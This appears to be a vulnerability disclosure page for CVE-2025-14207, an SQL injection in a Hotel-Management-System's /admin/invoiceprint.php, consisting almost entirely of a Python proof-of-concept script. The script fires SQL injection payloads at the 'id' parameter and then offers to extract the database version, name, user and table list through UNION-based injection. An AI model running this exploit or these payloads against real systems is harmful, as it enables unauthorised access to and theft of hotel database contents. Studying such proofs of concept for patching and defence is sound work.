CVE-2025-14207 Hotel-Management-System /admin/invoiceprint.php SQL注入漏洞

#!/usr/bin/env python3 # CVE-2025-14207 SQL Injection PoC # Hotel-Management-System /admin/invoiceprint.php # CVSS: 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L import requests import sys TARGET_URL = "http://target.com/admin/invoiceprint.php" def test_sql_injection(): """Test for SQL injection vulnerability in ID parameter""" # Basic SQL injection test payloads payloads = [ "1' OR '1'='1", "1' UNION SELECT 1,2,3,4,5,6-- -", "1' AND SLEEP(5)-- -", "1' OR 1=1 LIMIT 1-- -" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } print(f"[*] Testing CVE-2025-14207 SQL Injection") print(f"[*] Target: {TARGET_URL}") for payload in payloads: try: params = {"id": payload} response = requests.get( TARGET_URL, params=params, headers=headers, timeout=10, verify=False ) print(f"\n[*] Payload: {payload}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") # Check for SQL error messages sql_errors = [ "mysql_fetch", "mysqli_fetch", "SQL syntax", "Warning", "mysql_num_rows" ] for error in sql_errors: if error.lower() in response.text.lower(): print(f"[!] Potential SQL error detected: {error}") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") def extract_database_info(): """Extract database information using UNION-based injection""" # UNION-based injection to get database info info_payloads = { "version": "1' UNION SELECT 1,@@version,3,4,5,6-- -", "database": "1' UNION SELECT 1,database(),3,4,5,6-- -", "user": "1' UNION SELECT 1,user(),3,4,5,6-- -", "tables": "1' UNION SELECT 1,group_concat(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database()-- -" } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } print("\n[*] Extracting database information...") for info_type, payload in info_payloads.items(): try: params = {"id": payload} response = requests.get( TARGET_URL, params=params, headers=headers, timeout=10, verify=False ) print(f"\n[*] {info_type.upper()}:") print(f"[*] Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Failed to extract {info_type}: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] test_sql_injection() response = input("\n[*] Do you want to extract database information? (y/n): ") if response.lower() == 'y': extract_database_info()